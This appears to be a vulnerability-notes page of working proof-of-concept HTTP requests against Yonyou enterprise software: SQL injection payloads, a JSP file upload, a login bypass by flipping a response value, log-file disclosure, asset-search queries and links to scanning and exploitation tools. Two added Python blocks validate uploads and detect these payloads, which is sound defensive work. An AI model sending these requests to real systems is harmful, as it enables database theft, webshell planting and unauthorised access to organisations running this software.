Yonyou

Contents
- Yonyou KSOA PayBill SQL injection vulnerability POC
- Mobile management system uploadApk.do arbitrary file upload vulnerability
- Yonyou KSOA servlet imagefield file sKeyvalue parameter SQL injection
- Yonyou KSOA TaskRequestServlet SQL injection vulnerability
- Yonyou file server authentication bypass
- Yonyou GRP-U8 information disclosure
- Combined exploitation

Yonyou KSOA PayBill SQL injection vulnerability POC
POST /servlet/PayBill?caculate&_rnd= HTTP/1.1
Host: 1.1.1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 134
Accept-Encoding: gzip, deflate
Connection: close

<?xml version="1.0" encoding="UTF-8" ?><root><name>1</name><name>1'WAITFOR DELAY '00:00:03';-</name><name>1</name><name>102360</name></root>

Mobile management system uploadApk.do arbitrary file upload vulnerability
POST /maportal/appmanager/uploadApk.do?pk_obj= HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryvLTG6zlX0gZ8LzO3
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Cookie: JSESSIONID=4ABE9DB29CA45044BE1BECDA0A25A091.server
Connection: close

------WebKitFormBoundaryvLTG6zlX0gZ8LzO3
Content-Disposition: form-data; name="downloadpath"; filename="a.jsp"
Content-Type: application/msword

hello
------WebKitFormBoundaryvLTG6zlX0gZ8LzO3--
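Server-side validation that would reject the request above, added here as an example and not code from this page or from Yonyou: it parses the multipart body itself, then applies a filename extension allow-list (the endpoint is an APK uploader, so accepting only .apk is an assumption) and a ZIP magic-byte check on the file content, instead of trusting the client-supplied filename extension or Content-Type. The boundary and the malicious sample body are taken from the request above; the valid sample body, the function names and the allow-list are assumptions.

```python
from __future__ import annotations

import re
from typing import NamedTuple

# Assumption: the endpoint exists to receive APK packages, so only .apk is accepted.
ALLOWED_EXTENSIONS = {"apk"}
ZIP_MAGIC = b"PK\x03\x04"  # an APK is a ZIP archive, so a real one starts with this

BOUNDARY = "----WebKitFormBoundaryvLTG6zlX0gZ8LzO3"  # boundary used in the request above

# Constructed body mirroring the request above: a .jsp file sent to the APK uploader.
MALICIOUS_BODY = b"".join([
    b"------WebKitFormBoundaryvLTG6zlX0gZ8LzO3\r\n",
    b'Content-Disposition: form-data; name="downloadpath"; filename="a.jsp"\r\n',
    b"Content-Type: application/msword\r\n",
    b"\r\n",
    b"hello\r\n",
    b"------WebKitFormBoundaryvLTG6zlX0gZ8LzO3--\r\n",
])

# Constructed body for a legitimate upload (a few fake ZIP header bytes stand in for a real APK).
VALID_BODY = b"".join([
    b"------WebKitFormBoundaryvLTG6zlX0gZ8LzO3\r\n",
    b'Content-Disposition: form-data; name="downloadpath"; filename="app.apk"\r\n',
    b"Content-Type: application/vnd.android.package-archive\r\n",
    b"\r\n",
    ZIP_MAGIC + b"\x14\x00\x00\x00\x08\x00\r\n",
    b"------WebKitFormBoundaryvLTG6zlX0gZ8LzO3--\r\n",
])


class Part(NamedTuple):
    name: str
    filename: str
    content_type: str
    body: bytes


def parse_multipart(body: bytes, boundary: str) -> list[Part]:
    """Minimal multipart/form-data parser, sufficient for bodies shaped like the one above."""
    delimiter = b"--" + boundary.encode()
    parts: list[Part] = []
    for chunk in body.split(delimiter)[1:]:
        if chunk.startswith(b"--"):  # closing delimiter: "--boundary--"
            break
        chunk = chunk.lstrip(b"\r\n")
        head, _, data = chunk.partition(b"\r\n\r\n")
        headers = head.decode("utf-8", "replace")
        name = re.search(r'(?<!file)name="([^"]*)"', headers)
        filename = re.search(r'filename="([^"]*)"', headers)
        ctype = re.search(r"Content-Type:\s*([^\r\n]+)", headers, re.I)
        if data.endswith(b"\r\n"):  # the CRLF before the next delimiter is not file data
            data = data[:-2]
        parts.append(Part(
            name.group(1) if name else "",
            filename.group(1) if filename else "",
            ctype.group(1).strip() if ctype else "",
            data,
        ))
    return parts


def validate_upload(part: Part) -> tuple[bool, str]:
    """Decide server-side whether a part is an acceptable APK; the client's Content-Type is ignored."""
    fname = part.filename
    if not fname or "\x00" in fname or "/" in fname or "\\" in fname:
        return False, "missing or unsafe filename"
    ext = fname.rsplit(".", 1)[1].lower() if "." in fname else ""
    if ext not in ALLOWED_EXTENSIONS:
        return False, f"extension '{ext}' not allowed"
    if not part.body.startswith(ZIP_MAGIC):
        return False, "content is not a ZIP/APK archive"
    return True, "ok"


def check_request(body: bytes, boundary: str) -> list[tuple[str, bool, str]]:
    """Validate every file part in a request body; returns (filename, accepted, reason) per part."""
    return [(p.filename, *validate_upload(p)) for p in parse_multipart(body, boundary) if p.filename]


if __name__ == "__main__":
    for label, body in (("malicious", MALICIOUS_BODY), ("valid", VALID_BODY)):
        print(label, check_request(body, BOUNDARY))
```

The extension check is taken from the last dot only, so a name such as shell.jsp.apk passes it and is then caught by the magic-byte check; in a real deployment the file would additionally be stored under a server-generated name outside the web root.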

Yonyou KSOA servlet imagefield file sKeyvalue parameter SQL injection
GET /servlet/imagefield?key=readimage&sImgname=password&sTablename=bbs_admin&sKeyname=id&sKeyvalue=-1'+union+select+sys.fn_varbintohexstr(hashbytes('md5','test'))--+ HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) 5bGx5rW35LmL5YWz
Accept-Encoding: gzip, deflate
Connection:

Yonyou KSOA TaskRequestServlet SQL injection vulnerability
/servlet/com.sksoft.v8.trans.servlet.TaskRequestServlet?unitid=1*&password=1,

Yonyou file server authentication bypass
Asset search:
app="用友-NC-Cloud", or app="用友-NC-Cloud" && server=="Apache-Coyote/1.1"
Intercept the response to the login POST request and change "false" to "true"; this bypasses the login.
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Date: Thu, 10 Aug 2023 20:38:25 GMT
Connection: close
Content-Length: 17

{"login":"false"}

Yonyou GRP-U8 information disclosure
Vulnerability description: the Yonyou GRP-U8 system allows its log files to be accessed directly, leaking sensitive information.
Batch scanning tool: https://github.com/MzzdToT/HAC_Bored_Writing/tree/main/unauthorized/用友GRP-U8
GET /logs/info.log HTTP/1.1
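A detection routine over captured requests, added here as an example and not taken from this page or from any tool it links: it applies regexes derived from the indicators in the requests above (WAITFOR DELAY, UNION SELECT with hashbytes or fn_varbintohexstr, a quote followed by a statement terminator, a .jsp filename inside a multipart upload, and direct requests for /logs/*.log) to request records as a reverse proxy or WAF might log them. The record layout, the rule names and the sample requests are constructed; the TaskRequestServlet entry above gives only the injectable parameter, so it has no sample here.

```python
import re
from urllib.parse import unquote_plus

# Rules derived from the indicators in the requests on this page. Each rule names the
# request field it inspects: the path, the URL-decoded query string, the body, or
# query and body together ("any").
RULES = [
    ("sqli_time_based", "any", re.compile(r"waitfor\s+delay", re.I)),
    ("sqli_union", "any", re.compile(r"union\s+select|fn_varbintohexstr|hashbytes\s*\(", re.I)),
    ("sqli_quote_terminator", "any", re.compile(r"'\s*(?:--|;)")),
    ("jsp_upload", "body", re.compile(r'filename="[^"]*\.jspx?"', re.I)),
    ("log_file_exposure", "path", re.compile(r"^/logs/[^?]*\.log$", re.I)),
]


def analyze(record: dict) -> list:
    """Return the names of the rules that match one captured request, in RULES order."""
    path, _, query = record["path"].partition("?")
    fields = {
        "path": path,
        "query": unquote_plus(query),  # decode %xx and '+' so keywords are visible
        "body": record.get("body", ""),
    }
    fields["any"] = fields["query"] + "\n" + fields["body"]
    return [name for name, field, pattern in RULES if pattern.search(fields[field])]


def scan(records: list) -> dict:
    """Map each request id to the rules it triggered; clean requests are omitted."""
    findings = {}
    for rec in records:
        hits = analyze(rec)
        if hits:
            findings[rec["id"]] = hits
    return findings


# Constructed request records shaped like a reverse-proxy capture (id, method, path, body).
# r1-r4 mirror the requests shown on this page; r5 is a benign PayBill request.
SAMPLE_REQUESTS = [
    {"id": "r1", "method": "POST", "path": "/servlet/PayBill?caculate&_rnd=",
     "body": "<?xml version=\"1.0\" encoding=\"UTF-8\" ?><root><name>1</name>"
             "<name>1'WAITFOR DELAY '00:00:03';-</name><name>1</name><name>102360</name></root>"},
    {"id": "r2", "method": "POST", "path": "/maportal/appmanager/uploadApk.do?pk_obj=",
     "body": "------WebKitFormBoundaryvLTG6zlX0gZ8LzO3\r\n"
             "Content-Disposition: form-data; name=\"downloadpath\"; filename=\"a.jsp\"\r\n"
             "Content-Type: application/msword\r\n\r\nhello\r\n"
             "------WebKitFormBoundaryvLTG6zlX0gZ8LzO3--\r\n"},
    {"id": "r3", "method": "GET",
     "path": "/servlet/imagefield?key=readimage&sImgname=password&sTablename=bbs_admin"
             "&sKeyname=id&sKeyvalue=-1'+union+select+sys.fn_varbintohexstr(hashbytes('md5','test'))--+",
     "body": ""},
    {"id": "r4", "method": "GET", "path": "/logs/info.log", "body": ""},
    {"id": "r5", "method": "POST", "path": "/servlet/PayBill?caculate&_rnd=1",
     "body": "<root><name>1</name><name>2</name><name>1</name><name>102360</name></root>"},
]

if __name__ == "__main__":
    for rid, hits in scan(SAMPLE_REQUESTS).items():
        print(rid, ", ".join(hits))
```

The rules are signatures for the exact techniques shown on the page and will not catch encoded or reworded variants; they are a starting point for alerting, to be paired with the server-side fixes (parameterised queries, an upload allow-list, no web access to the log directory) rather than a substitute for them.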

Combined exploitation
https://github.com/wgpsec/YongYouNcTool